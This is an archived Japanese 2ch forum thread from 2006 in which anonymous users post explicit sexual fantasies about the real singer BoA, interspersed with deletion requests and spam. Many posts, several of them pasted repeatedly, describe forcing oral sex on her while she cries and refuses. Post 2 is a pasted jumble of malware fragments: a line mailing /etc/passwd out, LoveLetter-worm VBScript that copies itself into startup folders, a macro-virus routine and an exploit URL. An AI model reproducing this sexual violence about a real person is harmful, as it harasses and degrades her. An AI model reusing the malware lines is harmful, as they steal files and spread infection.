5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BoAさんにフェラチオしていただきたい方集合

1 :名無しの歌姫:2006/09/14(木) 20:00:40 ID:XLNnMnyD
圧倒的構築美を要するBoAさんにフェラチオされてもらうのは全日本男性の辛辣かつ健全な望みですよね。

そういう紳士達求む!

2 :名無しの歌姫:2006/09/14(木) 20:03:16 ID:X4vdpCUk
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

3 :名無しの歌姫:2006/09/14(木) 20:33:40 ID:9GY0dgWZ
自暴自棄になんなよBoAヲタ

4 :名無しの歌姫:2006/09/14(木) 20:40:00 ID:UK+tRUZy
フェラチオでいいのか!!
なんというひかえめな青年たちだ!

5 :名無しの歌姫:2006/09/14(木) 23:43:51 ID:OIV3e5kr
BoAさんの麗しき美顔でフェラチオは男の夢

6 :名無しの歌姫:2006/09/15(金) 00:03:32 ID:zBH2+aZU
キムチ臭くなる

7 :名無しの歌姫:2006/09/15(金) 00:14:35 ID:675mqDCV
BoAちゃんに手コキされたい

8 :名無しの歌姫:2006/09/15(金) 13:05:42 ID:NMKA7i1x
あの美しい顔の口に自分のチンコしゃぶらさせて頂くのは至上の極楽ですよね。

9 :名無しの歌姫:2006/09/15(金) 13:58:16 ID:1h3rdl5X
ていうかやりたい

10 :名無しの歌姫:2006/09/15(金) 14:10:50 ID:t0LIW6C/
>>9そこを録画したい

11 :(x ´・ω・ `) ◆ArwUV7MOlc :2006/09/16(土) 00:34:21 ID:4CpaRhS3
苛められたいスレもあったし、この手のスレで今現行中なのは
苛めたい!のほうだ。   荒らしも大人数みたいだし・・・
すごい人気だよなこれだけ反応があるわけだから。。。

12 :(*´Д`) ◆73WIRNrboA :2006/09/16(土) 09:11:47 ID:rbtLi7yz

寶兒子には
顔面マウンドポジションしていただきたいでつYO…

(*´Д`)ハァハァ

13 :名無しの歌姫:2006/09/16(土) 09:32:08 ID:Lx4RDYN2
なんだ、フェラされたことのある方じゃないのか…
すんません、出ていきます。

14 :名無しの歌姫:2006/09/16(土) 10:02:57 ID:FkJ6wN4U
BoAタンのほっぺの内側にチンポグリグリしたい

15 :名無しの歌姫:2006/09/16(土) 11:03:44 ID:+mWEe/Yj
69でおk

16 :(*´Д`) ◆73WIRNrboA :2006/09/16(土) 13:59:42 ID:rbtLi7yz

身長188aの
漏れと
156aの寶兒子とでは
69プレイが成立しませんYO…

(´〜`;)

17 :名無しの歌姫:2006/09/16(土) 14:35:55 ID:MCVq4D3O
BoAさん(笑)
http://music5.2ch.net/test/read.cgi/mjsaloon/1155440880/

18 :名無しの歌姫:2006/09/16(土) 15:07:23 ID:JCYPIdsU
>>1
即刻このスレを削除して下さい。

2チャンネルとはいえ許す事は出来ないです。

19 :名無しの歌姫:2006/09/16(土) 16:27:40 ID:rsPUdeQg
id

20 :名無しの歌姫:2006/09/16(土) 16:48:08 ID:nNJiEYUM
涙目の鰤に玉を含ませたり、舌で裏筋を舐めさせたり、横からくわえさせたり、頬の裏まで使わせたり、とにかく色々とねっぷり仕込む。最終的には、命令せずとも自分から積極的に奉仕するようにさせる。
フィニッシュは舌を出させた待ち状態の顔に、手コキで抜かせて、ぶっかけ。
口から外れて顔に飛び散った精液も、残らず自分の手で集めさせて味わわせる。
俺が「良し」と言うまで飲んじゃ駄目。口に溜めたまま五分くらいモゴモゴさせてから、一旦、口を開けさせて溜まった精液を確認。
それから飲み下させて、味の感想を聞く。
「まずい」と言ったら「うまいと思えるまで飲ませてやる」と言ってやり直し。
「うまい」と言ったら「じゃあもう一度飲ませてやる」と言ってやり直し。

21 :名無しの歌姫:2006/09/16(土) 17:44:29 ID:JCYPIdsU
BOAの所属するSMエンターテイメントという事務所の者ですが、
誹謗・中傷が目立つ書き込みや事実無根の書き込みに対しては、名誉毀損に該当するとして、法的措置もじさない構えで対処しますので宜しくお願いします。
又、プロバイダ責任法に基ずき、管理者へ書き込みの削除や特定者の氏名・住所等を公開するよう求める事も出来ますのでご了承下さい。
尚、2チャンネルや他の掲示板においても監視しておりますが、所属タレントの名誉を守る為の行為ですので、一般のファンの皆様方にはご理解を頂けると幸いです。

22 :名無しの歌姫:2006/09/16(土) 17:56:10 ID:+mWEe/Yj
(*´Д`)に極刑をあたえてやってください

23 :名無しの歌姫:2006/09/16(土) 18:30:32 ID:FkJ6wN4U
>20
いい男だ

24 :名無しの歌姫:2006/09/16(土) 21:48:35 ID:/+TqOeR2
( ´,_ゝ`)プッ


72 名前:性的嫌がらせ [] 投稿日:2006/09/16(土) 19:31:27 HOST:07051061911904_vc wbcc3s06.ezweb.ne.jp
http://c-au.2ch.net/test/-/musicjf/1158231640/i

タイトルが誹謗・中傷する為に付けられていますので、即刻削除をお願い致します。

73 名前:部外者の野次馬 [sage] 投稿日:2006/09/16(土) 19:40:17
>>72
一群さんは、本人若しくは所属事務所の削除依頼しか受理しないようです。

25 :名無しの歌姫:2006/09/16(土) 21:53:42 ID:4CpaRhS3
>>18
まず、おしおきスレをなんとかしてください・・・
あそこは鬼畜の溜まり場です。


26 :名無しの歌姫:2006/09/16(土) 21:55:57 ID:4CpaRhS3
>>20
『普通!!』

27 :(*´Д`) ◆73WIRNrboA :2006/09/16(土) 22:31:21 ID:rbtLi7yz
>>22

なんてこと言うんだYO、ぉまぃは…

┐('〜`;)┌

漏れは
村井秀夫みたいな死に様は
晒したくないでつYO…

((((;゚Д゚))))ガクガクブルブル

28 :転載:2006/09/17(日) 01:00:59 ID:kM1qf+QY
削除依頼は公開されてますから。
ガイドラインも読まずに依頼して来るあなたのほうが迷惑です。
あと内容がキモイです。


74 :性的嫌がらせ :2006/09/17(日) 00:32:10 HOST:07051061911904_vc wbcc3s09.ezweb.ne.jp
http://c-au.2ch.net/test/-/musicjf/1158231640/24

正義が悪魔によって否定されています。
早く削除をお願い致します。

29 :名無しの歌姫:2006/09/17(日) 04:15:11 ID:f8TnyP4t
BoAさんには是非カルピスのCMにまた出演していただきたい。

30 :名無しの歌姫:2006/09/17(日) 06:36:21 ID:t6GqvQe+
BoAが舌チョロチョロ・・・ウヒョー

31 :名無しの歌姫:2006/09/18(月) 17:02:12 ID:F1qnLIQp
>>23
だろ

32 :名無しの歌姫:2006/09/19(火) 09:44:28 ID:nMZMlGGz
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪


33 :名無しの歌姫:2006/09/19(火) 12:46:31 ID:xBy0Emqu
いまどき処女にこだわる青年がいたとは!!

童貞ですか?

34 :名無しの歌姫:2006/09/19(火) 15:35:06 ID:uBmQZU8V
ヤバイネコノスレチンポタッテキタ

35 :名無しの歌姫:2006/09/19(火) 16:49:16 ID:mWGBv2Ov
気が強そうなBoAちゃん
口の中に直接出したらどんな反応するだろう

36 :名無しの歌姫:2006/09/19(火) 17:24:25 ID:rEg3A4Lv
今抱きしめるでボアニーした

37 :名無しの歌姫:2006/09/20(水) 01:09:23 ID:LzVPTqVg
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪


38 :名無しの歌姫:2006/09/20(水) 13:32:00 ID:BHOvDs2Z
最近見ないな

39 :エージェント:2006/09/20(水) 13:43:29 ID:4PlegGbf
削除依頼引き受けます

40 :名無しの歌姫:2006/09/20(水) 23:41:37 ID:LQmK1WGf
>>39
お願いします。

41 :名無しの歌姫:2006/09/21(木) 15:22:55 ID:yZL6ssNZ
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪

42 :名無しの歌姫:2006/09/21(木) 15:56:37 ID:vYJGSjlW
削除依頼求む!!!


43 :名無しの歌姫:2006/09/21(木) 16:42:04 ID:qErdQ2QS
BoAちゃんにねっとりフェラされたい

44 :名無しの歌姫:2006/09/21(木) 16:51:24 ID:+60GNNGC
>>43
いやそこはバキュームだろw

45 :名無しの歌姫:2006/09/21(木) 22:11:30 ID:Nh3/rUPx
知的美人がフェラにさせるの最高!

46 :名無しの歌姫:2006/09/22(金) 00:33:48 ID:3BoTnVqi
>>45
慌てず日本語で喋れ

47 :名無しの歌姫:2006/09/22(金) 16:50:50 ID:T4+meS4q
強い口調で「無理!!」「嫌っ!!」と言って嫌がり大声で泣きわめくBoAタンのお口に漏れのビンビンに勃起したペニスを強引にねじ込みたい(*^^*)

それから、嫌がるBoAタンに上目使いで卑猥な音を立てさせながら無理矢理フェラさせたい(*^^*)

その後、口内発射した漏れの特濃の精液を「オラオラ、漏れの精液は濃厚で美味いだろ?味わって残さず全部飲むんだぞ!」と言葉攻めにして全部飲み干させたい(*^^*)

そして親日家のBoAタンに反日感情を抱かせたい(*^^*)

48 :名無しの歌姫:2006/09/24(日) 03:39:26 ID:s/opNXXl
>>47
>親日家のBoAタンに反日感情を抱かせたい

別に僕はBoAさんに反感は持っていないけど、
この人、親日家ではないと思う。
やっぱり反日関連のもの(映画でしたっけ?)にお金を寄付するのは
ちょっとひくわ。

あと、関係ないけど嫌韓厨は消えて欲しいよね。
今のところ特ア系の板で隔離はうまくいってると思うけど
嫌韓厨の民度低すぎ。


49 :名無しの歌姫:2006/09/24(日) 11:16:23 ID:okz2XDzW
BoAのフェラ顔が見て〜!

50 :名無しの歌姫:2006/09/24(日) 20:08:13 ID:gw8O12Fg
>>49
同意ですぞ!

51 :名無しの歌姫:2006/09/25(月) 00:56:03 ID:NDrZGdAH
>>35
「無理っ!嫌っ!」と言ってナニを噛み千切る

52 :名無しの歌姫:2006/09/25(月) 07:19:56 ID:/U8agfVY
なんかの番組で太いウィンナー食べてくれないかなぁ〜

53 :名無しの歌姫:2006/09/25(月) 09:18:11 ID:eis62qNz
age

54 :名無しの歌姫:2006/09/25(月) 09:32:33 ID:gilG62dZ
えっちねたにそんな感じの小説があったな

55 :名無しの歌姫:2006/09/25(月) 14:44:11 ID:Xwht/m9v
北へ還れ

56 :名無しの歌姫:2006/09/25(月) 16:50:39 ID:6tyJncE0
>>52
「太い」ってw

掲示板だからって、見栄はるなよ。
ポークビッツだろw


57 :名無しの歌姫:2006/09/25(月) 23:54:28 ID:VX9E3ASC
しょーこ、しょーこ、しょこしょこしょーこ・・・

58 :名無しの歌姫:2006/09/26(火) 15:53:46 ID:br1bTZYO
>>52
同意しますぞ。

59 :名無しの歌姫:2006/09/26(火) 18:12:12 ID:7SzhznKg
ここのスレは変態の集まりですか?

60 :名無しの歌姫:2006/09/26(火) 18:23:17 ID:FpDASzsA
聞かなくても分かるでしょ

61 :名無しの歌姫:2006/09/26(火) 18:30:28 ID:7SzhznKg
すみません・・・

62 :名無しの歌姫:2006/09/26(火) 18:45:34 ID:FpDASzsA
怒ってマシェン・・・

63 :名無しの歌姫:2006/09/26(火) 19:19:38 ID:JesKiQ0z
BoAにしつこくチンコけ蹴られたひ

64 :名無しの歌姫:2006/09/26(火) 22:03:38 ID:7SzhznKg
不覚にも笑ってしまいました

65 :名無しの歌姫:2006/09/26(火) 22:08:35 ID:kuiaX3w7
喪前等
亜保
氏値

66 :名無しの歌姫:2006/09/27(水) 15:26:26 ID:dirQEbT7
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪

67 :名無しの歌姫:2006/09/28(木) 11:17:34 ID:ePSkqgS5
強い口調で「無理!!」「嫌っ!!」と言って嫌がり大声で泣きわめくBoAタンのお口に漏れのビンビンに勃起したペニスを強引にねじ込みたい(*^^*)

それから、嫌がるBoAタンに上目使いで卑猥な音を立てさせながら無理矢理フェラさせたい(*^^*)

その後、口内発射した漏れの特濃の精液を「オラオラ、漏れの精液は濃厚で美味いだろ?味わって残さず全部飲むんだぞ!」と言葉攻めにして全部飲み干させたい(*^^*)

そして親日家のBoAタンに反日感情を抱かせたい(*^^*)


68 :名無しの歌姫:2006/09/28(木) 14:06:25 ID:yohykJNS
高校に行かなかったBoAは、たぶんフェラチオという行為自体知らないと思う
仕事仲間とはそういう話しはしないと思うから

69 :名無しの歌姫:2006/09/28(木) 15:36:09 ID:1bNQPruz
男は黙ってBOA(*^^*)

70 :名無しの歌姫:2006/09/28(木) 16:59:59 ID:nMhfTFUh
涙目の鰤に玉を含ませたり、舌で裏筋を舐めさせたり、横からくわえさせたり、頬の裏まで使わせたり、とにかく色々とねっぷり仕込む。最終的には、命令せずとも自分から積極的に奉仕するようにさせる。
フィニッシュは舌を出させた待ち状態の顔に、手コキで抜かせて、ぶっかけ。
口から外れて顔に飛び散った精液も、残らず自分の手で集めさせて味わわせる。
俺が「良し」と言うまで飲んじゃ駄目。口に溜めたまま五分くらいモゴモゴさせてから、一旦、口を開けさせて溜まった精液を確認。
それから飲み下させて、味の感想を聞く。
「まずい」と言ったら「うまいと思えるまで飲ませてやる」と言ってやり直し。
「うまい」と言ったら「じゃあもう一度飲ませてやる」と言ってやり直し。

71 :名無しの歌姫:2006/09/28(木) 19:54:45 ID:b1zOg65V
しっかりくわえろよ!BoA!!

72 :名無しの歌姫:2006/09/30(土) 18:13:19 ID:0FwAAGCy
>>68
フェラチオって行為知らなそうっての同意。
だからこそ仕込み甲斐がある(^o^)/

73 :名無しの歌姫:2006/09/30(土) 19:13:55 ID:2pyAympl
ぼあちんはくわえまくりだぞ

74 :名無しの歌姫:2006/10/04(水) 23:37:51 ID:eVNK686Z
強い口調で「無理!!」「嫌っ!!」と言って嫌がり大声で泣きわめくBoAタンのお口に漏れのビンビンに勃起したペニスを強引にねじ込みたい(*^^*)

それから、嫌がるBoAタンに上目使いで卑猥な音を立てさせながら無理矢理フェラさせたい(*^^*)

その後、口内発射した漏れの特濃の精液を「オラオラ、漏れの精液は濃厚で美味いだろ?味わって残さず全部飲むんだぞ!」と言葉攻めにして全部飲み干させたい(*^^*)

そして親日家のBoAタンに反日感情を抱かせたい(*^^*)

75 :名無しの歌姫:2006/10/12(木) 11:23:16 ID:CoHPcRC+
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪


76 :名無しの歌姫:2006/10/12(木) 11:46:46 ID:dy4NyLGA
BoAにカポカポチュポチュポとイヤらしい音をさせてフェラさせたい。

77 :名無しの歌姫:2006/10/12(木) 11:52:31 ID:TaCm53F5
お前ら面白いな

78 :名無しの歌姫:2006/10/12(木) 12:27:59 ID:gSWkB/lL
藻前らキンモー☆ww

79 :ohhashuyoshimisaitei:2006/10/21(土) 12:56:19 ID:KikqVnYz
してもらう?
イマラチオをさせてやるよ こいつなんか

80 :名無しの歌姫:2006/10/21(土) 13:29:48 ID:FADvMXVM
BoAの顔に精液塗りたくりたい

81 :名無しの歌姫:2006/10/23(月) 13:14:15 ID:eEQeZZ8l
>>76
ですよね。

82 :名無しの歌姫:2006/10/23(月) 21:06:14 ID:cZ8B/Ymn
BoA子はたやすくフェラする軽い子ではありません。
残念ながら君達の夢はかないませんよ、

83 :名無しの歌姫:2006/10/24(火) 11:14:12 ID:MTXG6Lp+
軽い子じゃないからこそBoAフェラは興奮するのであります(*゚∀゚)=3

84 :名無しの歌姫:2006/10/24(火) 20:10:43 ID:ZJSeZF8f
BoAたん、怯えきった顔に躊躇無くチンポを擦りつけつつ口に無理矢理挿し込んで
イキたい!
その後、放心状態になったBoAたんを前から後ろからと汚して最後は小便掛けてフィニッシュ


85 :名無しの歌姫:2006/10/25(水) 18:07:27 ID:iTKMPdt9
BoAたん、怯えきった顔に躊躇無くチンポを擦りつけつつ口に無理矢理挿し込んで
イキたい!
その後、放心状態になったBoAたんを前から後ろからと汚して最後は小便掛けてフィニッシュ

86 :名無しの歌姫:2006/10/26(木) 14:13:54 ID:t9Q9p1QE
BoAタンのほっぺの内側にチンポグリグリしたい

87 :名無しの歌姫:2006/10/26(木) 17:42:01 ID:70ZjcfIb
BoAは助手席に乗せてると直ぐチンコ触ってくるよ

88 :名無しの歌姫:2006/10/28(土) 19:58:42 ID:wVuRMoXi
BoAタンに捕まえられて全裸にされて両乳首をペロペロされて、僕はペニスから大量の先走り汁を放出。
「こんなに乳首が感じちゃうんだ。いやらしいっ!こんなに汁がいっぱい出てるよ」とBoAタンが興味本位に僕のペニスをいじくる。
「BoAちゃん、咥えて」と僕のペニスをBoAタンが咥える。そして咥えながらシコシコ・・・シコシコ・・・
「あ、あっ!イクっ!BoAちゃん、口の中にミルク出すよ!」「うん・・・」そして・・・
BoAタンの口の中に僕のミルクがドピュッ!ドピュッ!ついにBoAタンの口の中に僕のミルクを射精してしまった。
BoAタンは僕を見つめて僕のミルクをゴックンした。ついBoAタンがひと言。
「おいしーい」
実にBoAタンはSで変態な女の子だ。

89 :名無しの歌姫:2006/10/28(土) 20:27:01 ID:qIM5fY0n
オーパルパルへ行け!

90 :名無しの歌姫:2006/10/29(日) 14:38:58 ID:rQtJvY0v
紅月ルナってAV女優がBoAににてる、ヌケル

91 :名無しの歌姫:2006/10/29(日) 16:28:55 ID:/FRqJ7V2
BoAたんにイマラチオ。しゃぶるだけしゃぶらせて
我慢汁を口元にべったりつけさせる。じらすだけじらして
最後は予告なしに顔射。ザーメンはこぼさず全部ゴックン。


92 :名無しの歌姫:2006/10/29(日) 16:48:13 ID:6w2w2+XB
BoAはちんぽカポカポ音立ててくわえるよね

93 :名無しの歌姫:2006/10/30(月) 14:24:54 ID:R8s1JFui
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪


94 :名無しの歌姫:2006/10/30(月) 14:36:15 ID:MED/l+dy
BoAにくっさいちんぽ
しゃぶらせたい

95 :名無しの歌姫:2006/10/31(火) 21:21:47 ID:LTzVqDoc
BoAに涙目の鰤に玉を含ませたり、舌で裏筋を舐めさせたり、横からくわえさせたり、頬の裏まで使わせたり、とにかく色々とねっぷり仕込む。最終的には、命令せずとも自分から積極的に奉仕するようにさせる。
フィニッシュは舌を出させた待ち状態の顔に、手コキで抜かせて、ぶっかけ。
口から外れて顔に飛び散った精液も、残らず自分の手で集めさせて味わわせる。
俺が「良し」と言うまで飲んじゃ駄目。口に溜めたまま五分くらいモゴモゴさせてから、一旦、口を開けさせて溜まった精液を確認。
それから飲み下させて、味の感想を聞く。
「まずい」と言ったら「うまいと思えるまで飲ませてやる」と言ってやり直し。
「うまい」と言ったら「じゃあもう一度飲ませてやる」と言ってやり直し。

96 :名無しの歌姫:2006/11/01(水) 19:29:16 ID:hZUktqoQ
ハァハァ

97 :名無しの歌姫:2006/11/01(水) 19:36:57 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














98 :名無しの歌姫:2006/11/01(水) 19:37:41 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














99 :名無しの歌姫:2006/11/01(水) 19:38:43 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














100 :名無しの歌姫:2006/11/01(水) 19:39:43 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














101 :名無しの歌姫:2006/11/01(水) 19:40:08 ID:FqM/njwQ
100ボアニー

102 :名無しの歌姫:2006/11/01(水) 19:40:29 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














103 :名無しの歌姫:2006/11/01(水) 19:41:46 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














104 :名無しの歌姫:2006/11/01(水) 19:42:51 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














105 :名無しの歌姫:2006/11/01(水) 19:43:50 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














106 :名無しの歌姫:2006/11/01(水) 19:44:53 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














107 :名無しの歌姫:2006/11/01(水) 19:46:45 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














108 :名無しの歌姫:2006/11/01(水) 19:47:32 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














109 :名無しの歌姫:2006/11/01(水) 19:48:31 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














110 :名無しの歌姫:2006/11/01(水) 19:49:40 ID:MV2y+RU8
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10














111 :名無しの歌姫:2006/11/02(木) 13:23:36 ID:/q7kb4J8
BoAたん、怯えきった顔に躊躇無くチンポを擦りつけつつ口に無理矢理挿し込んで
イキたい!
その後、放心状態になったBoAたんを前から後ろからと汚して最後は小便掛けてフィニッシュ


112 :ROSSO NERO:2006/11/02(木) 14:58:25 ID:GKmGBVOX
フェラチオして〜ハァハァBoAタン〜

113 :名無しの歌姫:2006/11/02(木) 15:57:54 ID:DVLLffnd
BoAちんのほっぺの内側にチンチングリグリしたい

114 :名無しの歌姫:2006/11/02(木) 22:21:43 ID:VSuidHoB
コピペ多くね

115 :名無しの歌姫:2006/11/02(木) 22:36:31 ID:LDnmLvr5
男は黙ってBoA(*^^*)

116 :名無しの歌姫:2006/11/03(金) 02:40:55 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















117 :名無しの歌姫:2006/11/03(金) 02:41:57 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















118 :名無しの歌姫:2006/11/03(金) 02:43:10 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















119 :名無しの歌姫:2006/11/03(金) 02:44:11 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















120 :名無しの歌姫:2006/11/03(金) 02:45:18 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















121 :名無しの歌姫:2006/11/03(金) 02:46:36 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















122 :名無しの歌姫:2006/11/03(金) 02:47:47 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















123 :名無しの歌姫:2006/11/03(金) 02:49:00 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10















124 :名無しの歌姫:2006/11/03(金) 02:58:07 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















125 :名無しの歌姫:2006/11/03(金) 02:59:32 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















126 :名無しの歌姫:2006/11/03(金) 03:02:03 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















127 :名無しの歌姫:2006/11/03(金) 03:05:04 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















128 :名無しの歌姫:2006/11/03(金) 03:06:03 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















129 :名無しの歌姫:2006/11/03(金) 03:07:25 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















130 :名無しの歌姫:2006/11/03(金) 03:08:16 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















131 :名無しの歌姫:2006/11/03(金) 03:09:29 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















132 :名無しの歌姫:2006/11/03(金) 03:13:11 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















133 :名無しの歌姫:2006/11/03(金) 03:18:01 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















134 :名無しの歌姫:2006/11/03(金) 03:42:18 ID:nlgx6HjG
>>1 >>2 >>3 >>4 >>5
>>6 >>7 >>8 >>9 >>10




















135 :名無しの歌姫:2006/11/03(金) 12:27:10 ID:IE49Btpi
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪


136 :名無しの歌姫:2006/11/03(金) 18:11:08 ID:nbH5lniI
ちんちん

137 :名無しの歌姫:2006/11/04(土) 02:27:07 ID:0aLDllpz
ぶす

138 :名無しの歌姫:2006/11/04(土) 03:49:20 ID:Rj6ObSeX
超美形のBoAさん

139 :名無しの歌姫:2006/11/04(土) 06:40:23 ID:QreCO4XZ
BoAの綺麗な顔に20人位でぶっかけまくり
俺は4番目ね

140 :名無しの歌姫:2006/11/05(日) 20:29:30 ID:wkuTFL+7
強い口調で「無理!!」「嫌っ!!」と言って嫌がり大声で泣きわめくBoAタンのお口に漏れのビンビンに勃起したペニスを強引にねじ込みたい(*^^*)

それから、嫌がるBoAタンに上目使いで卑猥な音を立てさせながら無理矢理フェラさせたい(*^^*)

その後、口内発射した漏れの特濃の精液を「オラオラ、漏れの精液は濃厚で美味いだろ?味わって残さず全部飲むんだぞ!」と言葉攻めにして全部飲み干させたい(*^^*)

そして誕生日のBoAタンに「おめでとう」と言いたい(*^^*)


141 :名無しの歌姫:2006/11/08(水) 09:25:37 ID:IiPJnvLK
男は黙ってBoA(*^^*)

142 :名無しの歌姫:2006/11/08(水) 14:47:04 ID:vvtdSwhh
BoAのムッチリした脚を押さえ付けてクンニしたい。

143 :名無しの歌姫::2006/11/08(水) 17:14:59 ID:hS78flYe
尻コキしてくれBOA

144 :名無しの歌姫:2006/11/09(木) 12:10:49 ID:s0T3iArQ
やらしてや

145 :名無しの歌姫:2006/11/09(木) 12:19:28 ID:lHd5WbB3
>>1から>>144
通報しました

146 :名無しの歌姫:2006/11/09(木) 13:01:01 ID:MRLStOU8
>>1-145
通報しました

147 :名無しの歌姫:2006/11/11(土) 13:42:33 ID:sXTK8sIf
BoAたん、怯えきった顔に躊躇無くチンポを擦りつけつつ口に無理矢理挿し込んで
イキたい!
その後、放心状態になったBoAたんを前から後ろからと汚して最後は小便掛けてフィニッシュ


148 :名無しの歌姫:2006/11/20(月) 10:54:58 ID:+FIuXEgr
処女とセックスするとその女は非処女になるが
処女に精液をいくら飲ませてもその子は処女のまま
ってことでBoA♪


149 :名無しの歌姫:2006/11/20(月) 17:06:20 ID:bLB8QI3H
>>149
通報しました

150 :名無しの歌姫:2006/11/21(火) 00:33:07 ID:WXKRqohQ
>>149
通報乙w

151 :名無しの歌姫:2006/11/22(水) 15:24:25 ID:imaCFEeI
>>149
痛いなw

152 :名無しの歌姫:2006/11/22(水) 20:29:30 ID://fanBi5
>>153
通報しました

153 :名無しの歌姫:2006/11/23(木) 11:16:18 ID:ZYFTPKID
>>152
ありがとうございます。

154 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)